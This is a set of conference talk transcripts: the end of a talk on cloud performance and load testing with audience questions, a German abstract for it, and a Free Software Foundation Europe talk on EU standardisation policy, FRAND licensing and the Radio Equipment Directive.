characteristics of your system, and this is especially true for all those fully managed services that are available. And the only thing that you can do to deal with this complexity is building up a good understanding on what you are actually dealing with. And first of all, you have to know your own application, your own software architecture and system architecture that you are responsible for, that you are designing in terms of performance characteristics. Yeah, system software architecture and you also need to know your runtime environment, and in this example, it would be the cloud runtime environment that you are using. And this also extends to all those services that you are utilizing, for example, from the AWS cloud or from any other cloud vendor, and all those other third-party vendors that you are using, I don't know, logging as a service, database as a service, there are so many as a service things that you could possibly use, and you need to have a basic understanding, at least a basic understanding, what is happening there when you have a certain, yeah, traffic scenario or load scenario on your system. So, this is quite obvious that you, of course, need also conduct performance tests and load tests and all those kinds of testing in the cloud. And I would like now to go briefly over some of the, yeah, more important testing methods and take a look at what they actually mean and what you can achieve with those and what is particularly important when it comes to looking at the cloud. You said we have to be able to understand what's going on. Yeah. We agree with that, but the problem with all these cloud stuff is that they try to make fog. They make fog. So, we cannot understand the AWS cloud exactly going on. Yeah, and let me quickly repeat the question and then move the discussion later on. The question was in the, yeah, how can you build up an understanding of a system that is not open, right, is it or visible or, okay, yeah, but let's skip this discussion to later. Okay, first off, we have load testing, which is maybe the simplest and, yeah, no, it's the simplest form of a performance test where you induce a normal or an expected workload to your system and you want to take a look at the, maybe at the latency, at the throughput or error rates or whatever criteria that is important to you. And you usually do that in order to verify non-functional requirements or to see if you are able to hold your service level agreements. Yeah, but that's basically what I want to say about load testing. The other testing methods are a bit more interesting. Stress testing, for example, is basically a load test, but you are now explicitly going beyond the normal or expected workload that you expect to see on your system. And you do that to see how the system behaves at its design limits, for example, or when you, no, you want to understand how your system behaves at those limits. And you can also utilize stress testing or a series of stress testing to figure out what the capacity of your system actually is. You can increase the traffic over time and then see the point when you violate your quality criteria or maybe when your system eventually, yeah, doesn't serve any requests at all because, I don't know, the server died or so. Oh, yeah. Yeah, I just told you that. You have to define quality criterias, but that's basically the same with a load test. And then you steadily increase the traffic in multiple phases, for example, and you see when, and you take a look at when you are hitting the, or when you are violating the quality criterias that you defined before. Yeah. Right. And when you conduct a stress test, it's really important to have a deep look or you have the ability to have a deep look at your system. So you should have all your monitoring tools and profiling tools available so that you can actually learn something when you are inducing the traffic into your system. And you can use a stress test not only to see what the capacity is, obviously, but you can also start to identify the next bottlenecks, for example, if you want to push the boundary even further. And so you need to have some data and idea where to look next in order to improve the performance of your system. And it's a good tool, like I already said, to determine the capacity per resource. So you can do a stress test and just use one application for example, and then see how much users or how much requests or how much acts you can handle using that particular resource. And with that idea in mind, you can basically do a scalability test. You can now change the perspective on how effectively can you translate more resources into more capacity to your system, more requests per second, more users, and so on. And this is basically the foundation for capacity planning and cost estimation because you are maybe a fancy startup or so, and you haven't even launched a product, but you have a hockey stick growth, and you know that you have, I don't know, 10-fold the users per month or so. Then you need to know what will it cost in order to handle this growth scenarios. And what you do for scalability testing is basically a series of stress tests where you say, okay, you have maybe five resources, like five servers, and you measure when do you begin to violate your quality criteria. And in this case, I don't know, 170 capacity, maybe request per second, or concurrent users, or connections, it doesn't really matter. And then you add more resources, maybe more application servers, and then you get maybe roughly the double throughput, and then you do it again, add more resources, and over time, most certainly it will flatten out. And this is now a good basis to see, okay, maybe we just need to go in that area, and we are basically good because it works as we expected to work. We have almost linear growth, perfectly fine. But if we need to go here, then we might have a problem, and we might actually need to act immediately to fix this scenario. To give you a comparison, I initially talked about performance versus scalability, and that Facebook actually separates this into two different project areas. So what will happen if you increase the performance by 10%, then you will get something like that. Basically the same curve, but 10% higher. But what happens if you fix the scalability problem, then maybe in the beginning it's more or less the same, but the more you grow, the more resources you add, the more impact does a scalability project have on performance. And I'm not saying that you should only focus on scalability because most of us don't really run such a big system that this will really be a problem, but it is important to see the difference so that you actually know what you are aiming for when you are working on performance or scalability. Next up we have spike testing. And spike testing is trying to answer the question, how does your system behave under extreme load spikes? And you want to know, can you utilize the elasticity of the cloud good enough, and can you react fast enough to sudden changes in the traffic pattern that you are seeing at your system? There are several reasons where you have, we can actually plan those scenarios. For example, the marketing division has a crazy idea to send a push notification to half a million users at the same time, and maybe you want to prepare for such a scenario or talk them out of it to distribute it more over the day, or you have a mailing campaign or advertisement spot on TV or stuff like that, or maybe you are about to release a big feature and you, yeah, again, maybe the marketing division says, oh, this will go viral 100%, and then you need to be prepared for those scenarios. And basically what you are doing is you are running a load test, but you compress the traffic to very sharp spike, essentially, and you are then taking a look at how good can you absorb these spikes, where does your system fail first, how does it fail, which is really good information, especially when you are in this situation that your people actually know what to do and how to mitigate maybe such a sudden increase in traffic. Then we have soak testing, sometimes also cold endurance testing, which is kind of like the opposite of a spike test, where you basically want to know how your system behaves under a very, yeah, under maybe normal load situation, but for a very long, long time. Yeah, and this is basically a long load test, the definition of long is up to you basically, but normally it means many, many hours, maybe even days, that kind of depends on what application you are looking at. If it's an application that you are only deploying once a quarter, then maybe you want to run longer tests because you know that your systems are running for longer periods of time, but if you are, I don't know, crazy deploying like 50 times a day or so, then maybe it's not that important to ensure that you can run the system for many days without any memory leaks or disks spilling up or whatever. And it's also quite nice to do performance troubleshooting, maybe that area. I worked on an advertisement server and we had a really strange situations where for, I don't know, one days or two after a deployment we suddenly see strange CPU spikes on those ad servers. Then we basically did an artificial test that was aimed to look at a specific code path and then we just hammered it for like 10 hours or so, made many, many billions of requests and then finally saw what the problem is. And this is what I meant by those testing methods aren't really clearly distinguished. It's kind of a soak test, but it's also kind of a performance troubleshooting test. You get the idea. Okay, next up is the actually the, I think the most important testing methods when it comes to the cloud. And this is configuration testing. And configuration testing now changes the perspective to what kind of changes do you see in the observable behavior of the system when you are changing the environment. Normally you're not changing the environment, but you're changing the test and now you are actively changing the system that you are testing and run the same test over and over again to get a comparison between the two. And you get a comparison between multiple sets of configurations. Can we do this? I will come to that. Give me a minute. So this implies that you have to do a series of tests obviously because with one test you can't compare anything to something. And it is a really nice technique to learn about the environment that you are running in. And to give you some examples, what I'm actually talking about when I talk about configuration, when we go from top to bottom in the cloud, this would be starting with instance types for example. You have compute optimized, memory optimized, IO optimized and whatever instance types. You have different sizes and burst performance and normal performance and whatever. And this is a, yeah, I think the most practical example on what you want to do when you are running in the cloud and you want to do a performance configuration test. Maybe you want to do it to increase the throughput but maybe you also want to do this in order to get roughly the same throughput but at a much lower cost which would be optimizing the cost efficiency in that regard. Then we have many other services. I just took a couple of examples here. Auto scaling configuration for example where you have to define scaling. You basically define a group of servers and then you define scaling policies when to add more resources, how long to wait before adding even further resources when to scale down, how long does it take to boot up those new instances before they become available. Those are, there are many, many parameters that go into how to configure and how to deal with an auto scaling group that you maybe want to know how this behaves if you are actually using it beyond reading the documentation and clicking buttons in the UI. Then there is throughput provisioning and what I mean by throughput provisioning are those managed services that I talked about earlier where you basically say, okay, I want to have this event stream. I need, I don't know, 20 megabits of throughput there. You can roughly model it about against your, against your business logic. But sometimes you forget to model bugs for example and then you, you, you see that you are injecting, I'm sorry. Yeah. Yeah. The main problem is you forget to model, model issues that are not there by design and you should always go ahead and run a dynamic test to figure out if you are actually right, right about your assertions there. And the next point would be, yeah, the, the, are you using the, those services that are offered by your, by your cloud environment or maybe by other vendors. Are you using them in a right or optimal, optimal way? There are not only in the cloud but basically everywhere, many pitfalls that you can take when you, when you just start to look at how this, how those services and systems behave under, under load. And the list goes on. Obviously, this is not, not so much more cloud specific, but you have the hypervisor most of the time when you run on the virtualized environment. And even on AWS, you have some little knob here when it comes to the hypervisor that you can decide. Then you have the operation system level, obviously network tuning, kernel tuning, all those settings that are, are available to us. You have your web server application server stack where there are many configuration options, versions, dependencies that you can compare to one another. But also software configuration, I don't know, like database connection pools, timeouts, and so on and so forth. And also maybe even software dependencies, even things that you just use but don't manage by yourself can have a significant impact on the performance of your system. And with a configuration test, you can simply compare one version to another version or one TLS library to another TLS library and stuff like that. Yeah. And configuration testing is actually something that we do 100% of the time when we do consultant work for, for our customers. This is the most important technique to help them to improve their performance characteristics. Next up is something that I haven't found in this term actually, but I'm not sure if I missed something. I like to call it availability or resilience testing. This is a little bit inspired by the principles of chaos engineering. I don't know if you heard about them. It's from Netflix. They, they offered, or they, they published a manifesto, I think, where they all talk about how to, how to really make sure that your system is as resilient as possible. But anyhow, all those, all those things I talked before are things that you have directly under control. Maybe you have also under control when and how you deploy, but most of the time you forget that sometimes you have to deploy even when your system is under heavy load. For example, if you need to roll out a hot fix because something is broken. And maybe you want to do that with our downtime. And then you have to ask the question, or can you, or are you really sure that you can run a zero downtime deployment under heavy load? And this is something you should also at least think about testing and verifying those, those processes. And yeah, the next thing is that when you're running in a cloud environment, you basically are confronted with constant changes to your infrastructure. There are some automated tools that spin up new servers and shut them down again. Maybe you need something like a, like a service discovery tool and you want to, and are you really sure that you see the changes fast enough so that you don't run into any, any problems there? So these are all, all those scenarios do happen all the time, but most of the time someone or, yeah, it is simply forgotten that, that you should not only try this out on your dev environment and see, okay, the new server is booting up and the service is available and everything is good. But yeah, things suddenly change if you are seeing a lot of, a lot of load on your, on your system. And the list goes on for failure scenarios and failover verifying that your failover mechanisms are actually working. What is happening if the, I don't know, network connection to your caching server gets low or drops packets or the one, one of the database reed slaves suddenly dies. So do you, are you able to cope with, with those scenarios when you are confronted with, with high traffic scenario? Yeah. Okay. Then I would like to, to raise a question. So is this any difference to what we actually did or had to do before we were able to run those in the cloud and don't have to care about the servers ourselves anymore. And I would clearly answer this question with Jain. I think that the, the, the, the, the requirement and the testing methods haven't really, really changed. Basically, it's, it has been around for decades. Everyone knows what performance tests and load tests and such things were a long time ago. But what has really changed is the, the abilities or the possibility to, to run those tests in the, in the cloud context. And the most important thing here to keep in mind is that test environments are something that is really interesting when you, when you take a look at the cloud and what the cloud actually provides you with. If you really utilize all these APIs and automation possibilities, then suddenly it becomes really easy to provision test environments, not, not QA environments, but really perform production grade performance test environments, or maybe even scaled beyond the performance environment, the production environment to see a few, if you can handle larger, larger traffic. And by test environment, I mean everything from infrastructure, service, service, service configuration, code deployments, everything. If you, if you are able to, to automate this, then it might be really easy to, to spin up a performance test environment in the morning. And I don't know, maybe you have to wait one hour or so to load all the data into the environment. But then you have an environment that you can actually work and play, play with. And if you, if you do that correctly, then, then you can do this a lot more cost effective and more flexible than we were used to do it. I have one more quick question. Is someone working in an environment where you have one per test environment where you can run like a quality, like a QA environment for performance? One hand, two hand, three. Okay. So, so you have, okay, do you have three environments more or more than three environments? Two. Four. Nice. Okay. So, yeah, the, the problem usually is that, that performance environments that are, that are capable of, of handling this traffic and are comparable to a production environment are really expensive because you just have to buy lots of resources to, to mirror the production environment. And if you now have to do this like two, three, four and more times, it is get, it gets even more, more expensive. And it is quite a, quite a mismatch because you have now these days this pizza size teams like maybe 10 of them. And then you have to wait in order in line before you can actually, yeah, do your performance test of your feature or your product or your service that you are launching. And I know it's, I know it's really hard and maybe it's just a vision, but, but imagine that you can provision such an environment on demand for the, for the period of time that you needed for and then shut it down afterwards and save lots of money and time to, to manage and keep the systems up and running 24 seven, even if you are not using them 24 seven. Okay, but there is one remaining problem or one challenge, which is, yeah, the ability to reproduce your test environment perfectly, even though if you can automate all those provisioning steps like like creating the infrastructure networks firewall rules and servers and services, you have this little nasty thing called state in your system, you have product databases, for example, but you also have a state in terms of caches or file system caches application. There are many, many areas where you have state in your, in your system. And for me, it's a pretty much an unanswered question how to, how can you deal in an elegant way so that you can set your system in a, in a state that is a good starting point to make comparable performance tests. And how do you, how do you manage those, those test data? It's, it's quite a, quite a challenging task, at least from, from our, our experience. It's not so clear if you're, if you can use production data, if you have to use fake data, is it comparable to production data? Is it too optimistic, too pessimistic? There are many challenges and on, on how to, how to create or deal with test data and how to, how to manage it. Maybe data schemas changes for, for one feature and then you have to, yeah, have a good mechanism in order to, yeah, how to, how to apply those data so that it stays comparable from, from one environment to another environment. Yeah, and how do you automate all those state handling and data handling problem? I don't have a good answer for that. I'm happy to hear what you think about it. I'm almost done. A quick recap. So I talked about that resources or scaling resources is not the same as scaling applications. I think that most important thing why this is still the case is simply complexity. It's not, it's, it's still there. It's maybe hidden from us. And the only way out of this problem is building up a better and good understanding on how our, our systems behave. And I would like to, to encourage you if you are already running stuff in the cloud, then think about doing the same. Yeah, work that you, that you do in provisioning your production environments and just try to apply this for performance testing environments as well. And in the end, you want to have the cycle, right? It's not only for software engineering or development, but you, it should also, also apply on all those non-functional criteria that we have just talked about. So you want to design, design something you want to implement it, maybe not in code, but maybe in infrastructure. You want to measure it. You want, you want to validate it and you want to do it over and over again. And this would be the end. Thank you. So many hosting providers are switching from ranking servers to ranking services. So when they rent a service and performance varies every day, so what, what can I do for testing in this case? So the question is that hosting, hosting providers are switching from servers to services, right? And you see, or you, you add, yeah. And, and you actually see a fluctuation in the, in the performance of those services. Is that, okay. And how can I answer that? What was the actual question? Sorry. Okay. Yeah. Okay. So, so you, you, you are now going from renting, renting a server to, to renting a database, managed database. And you, you fear now that, that the quality of the performance of the system isn't as stable as it used to be by renting a server and managing the database yourself, right? Okay. So, I think it doesn't really matter what kinds of tools you're using. It's, it's, it's not the, it's not that there's any, any difference from, from perv testing your own server with the database that you manage versus the database that you, you basically rent. Because in the end, it's a database, you can talk to it just the same. So you can basically use the same, same tools to do that. And, and the, your statement that, that you are seeing different performance characteristics of those system is a good, is a, is a good argument for running these performances in the first place because you, because you want to see these performance differences. For once you, you could tell your database provider that, hey, every night between this time range, the performance degrades, what is happening on your end? I can, you can prove it because you have a series of tests, or maybe you are having some configuration problems, or you can do some configuration tuning, which would be the case for a configuration test where you compare multiple settings. Or maybe you can, you can provision more or less resources to your data, manage database. So that, that would be the, the ground from where you build up to, to get a better understanding on how your managed database behaves. I'm not sure if that's answered. Okay. I have a somewhat specific question. What is the general advice for handling with handling spikes, like we are already including a solution which is a particular entity responsible in those things, but is, I'm, what I'm thinking is about, is it good to augment auto scaling with some sort of reserve capacity for these situations or how do you deal with spikes? You got to predict that. Yeah. Yeah. Sometimes, sometimes you can, or the question is how do you actually deal with traffic spikes in the, in a, in a cloud environment. And if you, if you are, if you should go for auto scaling versus, or maybe even combined with over provisioning so that you have enough capacity. And, and the other comment was that most of, most of the time you, you can't really, really predict a traffic spike. This is, this is true. Sometimes it is true. Especially when, when we are asked to test things because, yeah, customers plan big marketing campaign or coordinated cross media campaign, campaign, then you can sort of guess what, what the traffic spike will look like if it really happens. But otherwise, yeah, you can't really fully prepare for that because it's a big, it's a big unknown. If you, if you are expecting such a traffic spike, then most of the cases solely relying on auto scaling won't really work in my experience because it's first, it's really hard to get all those scaling policies right and to optimize your server images in a way that they actually boot up really fast and are ready and service fast enough. So, and you really, at least for AWS, this is the case. You, you, you see that all those services at AWS are more designed to run on a, on a bigger scale. You have not only one instance per availability zone, but multiple ones. And you, you have to have some degree of free capacity of headroom in order to absorb the, the, the incoming wave and to give you more time to spin up more, more instances. And if you are expecting such a spike, then, yeah, you can basically prepare for it and just ramp up your desired capacity a little bit so that you, you, you can absorb the traffic better. And otherwise, yeah, I'm not really there, there, there is no general solution, no perfect general solution to that particular problem, actually. So, I thought that your ideas about them, chicken, so if I know my system can stay on like, yeah, and then the next question, the next question is for quality machine. Measurement. It's, it's, this is a, okay. Yeah, okay, you, you are, let me check if I can summarize the question. You are having trouble with the argument that you, that you can do run or that you should run performance test against the cloud if you have an environment that, that is, that is changing. And not only because you are changing it because the, the provider itself is, or other customers that are using these infrastructure are having an influence on your system as well, right. So the noisy neighbor problem, for example, and stuff like that. Okay. This is, this is quite, quite interesting. I get this question actually a lot. And from, there are some ground rules. I'm, I'm, I'm particularly familiar, familiar with AWS. I'm not so sure about all the other cloud environments out there, but for AWS, I can say that if you, if you avoid some very basic, stupid ideas like using these micro instances for your production traffic, for example, that, that have a, they, they, they can have or what was it called? I can, I think credit, CPU credits or so. So for a short amount of time, they can do a lot better in terms of CPU performance. And then for the rest of the hour, you are throttled to, to, to low, lower level. This is in general, a really bad, bad idea. But most of the time, the noisy neighbor problem is actually not, not such a big, big thing. But if you are using instance sizes that are typical, typical for, for the production environment. So for example, when it comes to network, network performance, we, we, we utilize the AWS network quite a lot because we are running tests from a couple of megabit per second to double digit gigabits per second range. And we rarely see any fluctuation or big flick fluctuation in the, in the network performance or packet performance actually. So if you are using HPM virtualization, for example, and use the correct settings on your, on your, on your servers, we rarely see a big change in the, in the general performance. If you are running, I don't know, mission, mission critical stock exchange application, then maybe you don't want to run it in the cloud in the first place. But for most of the applications that are running, it is, it is quite, what's that for, I'll say it again, the, the performance is quite predictable for the, for this cloud environment, at least for those mature providers. And this is at least our, our observations and the observations of our, of our customers. So that would make it quite comparable, at least within a specific margin of error. Yes, other, other experience when it comes to that. Okay. Okay. Yeah. You looked a bit skeptical. So normally are one more thing I like to add is normally the biggest performance issues are problems that are configuration based and just development stuff, engineering stuff, bugs that were introduced into the systems. Normally you have to work through a lot of stuff before you, you actually reach the area where you need to look at the underlying network performance. Yeah. So the question is about the order in which to perform those methods. But the order is, yeah, not strictly speaking, normally we just do a quick low test to start with. Just to see roughly if you, if you reach the area that you were actually aiming for, and then it's highly depends if you, if you are, if you are good, then we run a scalability test directly to see our stress, a series of stress tests to, to, to determine the capacity and to see if your system scales beyond your limit. This is most of the time customers request when, when they are running on the cloud. And then configuration testing is often used as a, as a, yeah, a troubleshooting or debugging tool or to, to quickly verify that, that, that the change you are making in order to optimize the performance because you saw on the low test that you have a big problem here, and you have an idea and you prototype it and, and apply it, then you want to do basically configuration test with the one version, maybe with the feature branch that you're testing. And if you are using a tool like, like we built, then you just hit a play button, run the test again and just compare, compare these things to one another. But yeah, and even though I said that configuration testing is the most important and interesting thing, it's most of the time it isn't really that what we do first, because first you have to see when, yeah, if you are hitting your goal, at least roughly. What are some of the tools you probably use to build your own? Yeah, most obviously I use my own, own tool most of the time. And I'm pretty, pretty familiar with, with Tsung, which is an Erlang based performance testing tool. I, yeah, I have to look into Jmeter from time to time because customers are using it. Jmeter, yeah, and yeah, there are lots of other, other tools out there. But in the end, it doesn't really, I have to be careful because the sales guys are hating me for that. It doesn't really matter what tool you are using, at least not at first, because it's much harder to, to get an idea on what you want to learn, what you want to test, how you want to test, and so on. And that's how you want to test, how do you organize those tests, who, who is responsible for testing, who should be present when you are doing a larger test. Those are all things that are much harder to, yeah, to, to start with compared to, yeah, picking the ideal tool for your solution or, yeah, automating it to the, to the last, last extent. I would say them, it is more, more important to get started quickly and to have the first, yeah, to first, the first results quickly so that you can iterate on, on that. And if you need to switch the tool or, if you are happy with the tool, it's, yeah, it's something that, at least from my experience, comes a little bit later. Okay. What's wrong with your question? Or was it answered? Okay. Okay. Yeah. Okay. Thank you very much. Thanks.
|
Die Cloud™ ist unendlich und skalierbar. Punkt. Warum ist es dann noch wichtig die Performance und Skalierbarkeit von Cloud-basierten Systemen zu testen? Skaliert nicht mein Anbieter mein System, solange ich mir das leisten kann? Ja, aber… Cloudanbieter skalieren in erster Linie Ressourcen. Sie sorgen nicht automatisch dafür, dass Anwendungen schnell, stabil und – viel wichtiger – skalierbar sind. Performancetests sind ein wichtiges Instrument, um ein System und dessen Laufzeitumgebung zu verstehen.
|
10.5446/32463 (DOI)
|
Okay, welcome everyone to the afternoon track for a frost call. In this room we have Polina Malaya from the Free Software Foundation Europe. She'll tell us a bit about EU policies and what they have for influence on open source projects. So, welcome. Thank you. So do you hear me? Yes, I hope it works. Okay. So, hi everyone. My name is Polina as I've been already introduced and I'm a human rights intellectual property rights lawyer, digital rights activist and working for Free Software Foundation Europe as a policy analyst and a legal coordinator. And today I will give you a talk about EU policies and the most, actually the most recent ones that are important for Free Software and how FSFE is active in this topic. So there have been several attempts to include Free Software into discussions on European level and FSFE was following them from the start. But like through the policy advocacy work, so that means publishing analysis, meeting with the officials, campaigning for a change. But let's start from the beginning. Oh, no working. Does it work? Sorry. So, throughout the years, Free Software in the EU was mostly a part of internal IT strategies policies which were just only for like IT departments within the institutions and not much of a overall general policy field. And one of the examples are European Interpability Framework which was officially, I mean it was an official document from the start at the beginning, yes, for public administrations to increase interpability within public administrations. And also the other example is the open source strategy in European Commission. And this was mostly as a response to the excessive vendor lock-in within the EU institutions. So that is still evident from software purchase agreements in public procurement. So that means that EU institutions directly require acquiring particular vendors, for example Microsoft is one of the most dominant vendors. And that also resulted in the case in front of European Court of Justice where Microsoft was actually fined for its anti-competitive behavior on the market as desktop operating system. And FSFE was involved as an intervener in this case to represent interest of Free Software developers. So we argued that there is an excessive vendor lock-in in the EU institutions. So despite all these efforts by 2016, the vendor lock-in still stays steadily. And this is according to some data, according to some, the most recent study on the locking and ICT procurement. And so according to that study, 52% of respondents amongst public administrations have experienced vendor locking. And even though the awareness of that problem is high within the public administrations, there still feel almost powerless to question any alternative software. And so the most top-occurring vendors that institutions are buying are then Microsoft or a co-SAPU Windows. So this is what they require to acquire. But meanwhile, the world outside of EU is changing and Free Software is everywhere. And it's basically you can't overlook it because of nearly universal software development practices. So EU has to somehow address that topic. And so what is the key to success, EU questions? And so the reaction on the EU level has to follow. And one of the most interesting documents and the most recent ones is the Digital Single Market Strategy, which was adopted last year. And it's an umbrella initiative with different legislative and political reforms on the EU level, like how Europe can become an ICT leader on a global level. And so yeah, so EU tries to identify these key areas. And from Free Software perspective, the most important for Free Software are then the standardization policies. And EU identifies that the priority areas in standardization are the cloud, Internet of Things, Big Data, Cybersecurity and 5G. So this is a priority for the EU until the end of 2019. And how to implement those policies? EU also identifies then a couple of instruments. This is a joint initiative on European standardization, rolling plan for ICD standardization, annual union work program, and European Interoperability Framework. And one of the most interesting areas documents within this is another communication, which is from April this year. And it's actually made some noise in the community a bit, and from civil society, and a bit in the media because of its contradictory nature. And so it actually includes some really positive aspects for Free Software. So here we have to acknowledge that before EU was only focusing on Free Software as a part of internal strategy that was not supposed to go outside of the IT department, but now we're talking on some more general policy objective that might even somehow be reflected in the law. But yeah, who knows. So yeah, so the standardization priorities says that proprietary solutions can hamper the potential digital market and that we need common open standards and that we need to make more use of Free Software. And that is also for Internet of Things. It's the same that we need an open platform approach and promote open standards and also in data the same. So that's all the good, positive steps there. But of course it's not always as good as it seems from the beginning, so that's just a little, little, yeah, so there's no cloud, but Commission says there is. And there is one like, yeah, fly in the ointment, something that despite all this good stuff Commission says before, it bases its standardization policy on front licensing. And that is unacceptable for Free Software. So why is front bad for Free Software? So front are then so-called fair, reasonable and nondiscriminatory terms to license standards that are essential, no, patents, license patents are essential for standard implementation. So standard is a common norm agreed within the industry and it's contained in specification which is protected by copyright, but it can also include references to patent and technology and in order for a project or implementer or company to implement that standard, it needs to acquire the patent license. And this is how also industry has resorted to these practices, mostly in telecommunication industry and saying that, okay, like you as a patent holder have that right to restrict your standard implementation and you have to license it so it's accessible for everyone on then, on these fair, reasonable, nondiscriminatory terms. But the problem is that as licenses, these front licenses are negotiated in secret, it is very difficult to know what is fair amongst the industry and what is reasonable and what is nondiscriminatory. And for that reason, front licensing practices are mostly and very often used as anti-competitive rule to abuse the monopoly that patent right holder have. And so that's why it's not favorable in general, but it's also especially not acceptable for free software because it goes against the licensing terms or how free software distributes it. So the problem is that it's mostly an exclusive license, which means that you only negotiate it once with particular implementer, but the other implementer who wants to implement the same technology has to go again to the same patent holder and negotiate it again. And it also includes usually a requirement to pay royalties, of course, per copy. Even in free software, it's difficult to calculate because there is, I mean, the license is non-exclusive and the distribution is not limited. So in conclusion, this is why it's not suitable for free software. So what can be solution? Commission, and also because the industry doesn't know what is front, or I mean, it depends on the negotiations, there is a possibility to define front on EU level, so it's acceptable for free software and that just removes all these restrictions. And the problem is that it's not front anymore. It's a restriction-free licensing, which is already in use for software, web and internet standards, and there is a reason why internet is basically functioning. So yes, so that's about front. And as we already briefly said, that the European Interoperability Framework is one of those instruments to implement the standardization policies, then it's also, yeah, so let's take a look into that. So it was first adopted as an official guideline for public administrations like within EU, and it was a really interesting document because despite of its unofficial status, it actually set an example for numerous national policies and included a very progressive approach at that time for open standards. It was actually requiring that in order to ensure interoperability, the open standards are needed to be promoted, and also the licensing policies were quite good in the sense for open standards and free software. And so in 2010, European Commission thought that it's a nice document that could also be sort of lifted upon from being unofficial to a more official status, and that included massive lobbying, and so the document was completely changed. And the open standards were in the end not called open standards, and they were called open specifications, which is misleading term because, I mean, it only reflects the specification part, which we already touched upon before, and it doesn't address other issues. And it's also just watering down the existing common known term, and it also introduced first the front that we just touched upon. And so FSCV identified that evident copy-based in the leaked drafts from European Commission and the lobbying group's positions that were handed in, so that's just a screenshot from that. You could see that the pink parts were just the exact copy-pays from the business source line comments that were submitted, and then the draft, so they just, like, our Commission just took one site instead of being impartial. Yes. So in 2016, European Interoperability Framework is again on agenda, so it actually is going again through a third revision, and the problematic parts are still there, so they're still taking basically the same approach as in the previous version, that there is no reference to open standards, and also from the wording it seems that the document is being even more lifted to even more stronger languages used, because they're already talking about how Member States should implement that, which is a bit too strong language for such document. And yes, I'm sorry. Okay, just ask quickly. Okay. Yeah, it's good. I would like to have them in the end, but go ahead. Yeah. You said this approach was more unofficial, and then with the second 2010, there was more official character. What does it mean in legal? Yes. Okay, yes. Yes, I understand the question. Thank you. Yes, so in 2010, it became from more internal documents. It became an actual initiative, which means that, okay, so this is an official document from the EU, and even though it doesn't have any legal because it's not law, so these are legal policies that are basically like they used to shape the existing laws in the Member States, but it's so basically like if Member State would not implement it, nothing will happen, because if law is not implemented, European Commission can sue state before European Court of Justice, but in this case, nothing will happen. They can just issue some recommendation being like, yes, please, because there is a supremacy of these policies, but in the end, Member States are free to do whatever they want. But the problem is that you could see that it gradually becomes more and more binding, and that's why we should care about it, because we don't want this to end up in the law if it goes wrong, because that's basically the question. So the problem with what's happening now is I've only seen one draft version, and it's just a speculation so far. That's why we need to act like when it's still in a draft rather than deal with the consequences later. So yeah, so yeah, so in 2010, it became an official document before it was unofficial. It was just internal. Then it was an official document, which is already an initiative, and they also issue studies and see how Member States, I mean, they score them according to that. Okay, how much of that you implemented in your state? Yes, they can't legally do anything, but it depends on the Member State. Some study shows that they are lagging behind, I guess, Member States see, okay, we're lagging behind, maybe we should do something. So it kind of depends, but yeah, but it's still like from 2016 perspective, it's still better to shape it in the right way because even if it actually becomes a law, then yeah, it will be difficult to do something when it's already adopted as a directive, for example, or something like that. Then it has to be implemented. So I hope I answered your question. Okay, yes, so on that note, yes, so that's the language is stronger. And one good thing about the draft right now is that royalty-free licensing is a preferred notion, which is a good thing because at least it eliminates from front the royalty criteria, but it doesn't address other restrictions that such licensing terms can pose on free software distribution. And yes, so that's on the, so that's on Interpravity Framework. So Digital Single Market, this umbrella initiative that the European Interpravity Framework is a part of, I think it's easier to understand why it affects software because it deals with such questions as ICT standardization of technologies. But there we will come to an actual law that is already adopted, enacted, and can have a more impact on free software than the previous instruments we were talking about because they are just impulses. But now we're talking about the radio equipment directive. And yeah, so how we get to know about that was actually a little like a little accident because we were following the discussions in the US, which we're talking about introducing some dangerous software compliance regime. And we thought, okay, we're going to look into our own laws. And apparently it turned out that because we didn't follow those policies and like non-binding documents, we actually missed that part when something dangerous was introduced into the law. And that is then the radio equipment directive, which we call radio lockdown directive. And so a bit of background about that. So it's a directive which means that it's a law and member states have to implement that. So if that's not in the national law, a commission can sue a state. So it was adopted in May 2014. And it affects all devices that consent and receive radio signals. So through Wi-Fi, mobile network, GPS. And its main purpose was to harmonize the existing rules. So there was already an other directive before that. But it wasn't implemented in the member states. And member states were just creating their own rules. And so for the harmonization purposes, this new directive was introduced. And so member states had two years to implement it. And so yeah, so it was actually this year, not too far, far time ago. But the problem is that it actually introduced dangerous requirement to ensure for safety and security reasons. And it's basically put an obligation on device manufacturers to ensure that the combination of hardware and software. Like you know, yeah, so I mean, how should, yeah. So basically saying that, OK, for security reasons, you can only put this, but you have to show that that software that can be put on that hardware is safe. And that means that it just puts a very disproportionate obligation on device manufacturers to test every possible hardware, software combination and say that, OK, this is secure and this is safe. And that basically creates a very dangerous situation where in fear of being liable for some safety critical bug or something, then they would just make sure that no alternative software can be put on the particular hardware. So that's in the end means that you can use alternative software on such devices as routers, Wi-Fi cards, and basically all Internet of Things devices. And that was then all justified for the security reasons. And but it turns out that installing alternative software actually helps increasing the device's security. And it also puts a very strict obligation that is unnecessary for such products as a router or a laptop, which has a limited radio output power. So it's a very vague obligation. And I mean, it's also, again, as law has been very general, but it's basically still creates that backdoor in the law. And but there is something that we can still do despite it being already unofficial law that has to be implemented. And so the problem with this obligation is that it is new one, and it hasn't been introduced. Yes, it hasn't been introduced before, according to the previous directive. And so how to implement that particular obligation in the member state is for first member states to decide because it's a directive. But also the European Commission has to come up with like an additional delegated act to say, OK, these devices, you should check for that compliance. Others not. And so these acts have not been adopted. And so if these acts could be somehow be influenced, then there is a reason to abstain from this dangerous impact. And so what we are arguing for is that in the member state, on the member state level, first that the delegated act should be done right, and that on the member state level, there should be an exception for free software. They say that it's OK to put free software. Or for a widespread and critical consumer devices, saying that, OK, these particular not critical infrastructure devices should not be impacted with this because it severely hampers consumers' choice and competition on the EU level. And so what FSFE has done is that we published, we were one of the first to draw attention to that and we published the joint statement. No, before we just published the information page. And many companies and other organizations came to us saying that, OK, I mean, it's something that we should also look into and can be somehow supported. And then we came up with the joint statement. So it's still open to signatories. And if you feel like this is something that should have an impact and should change on EU level and you want to have more voice into it, put more voice into it, then you can still sign it. And this is just one of the few companies and organizations who decided to support us there. So and yes, so and many other, you can check the first link and see all the other organizations. And so, yeah, I'm pretty quick today. And so if you want to support us in these areas and topics and on our goals and to make sure that we don't miss anything important for free software on the EU level, then you should subscribe to, first maybe subscribe to our newsletter because then you'll be updated on what's going on. And we also have always an action item there. So they weren't can act upon or write to their member of the Parliament or something like that. And or you can also order a promotional material and spread the word about us. And if you just don't have time for that, then you could always just support us with money and donate. Yes. So you can always drop me an email if there's something, some topic you would like to draw my attention and or just we always support of like we always in need of like technical expertise or anything like that. And thanks a lot. And yeah, I opened the floor for the questions and questions and answers. 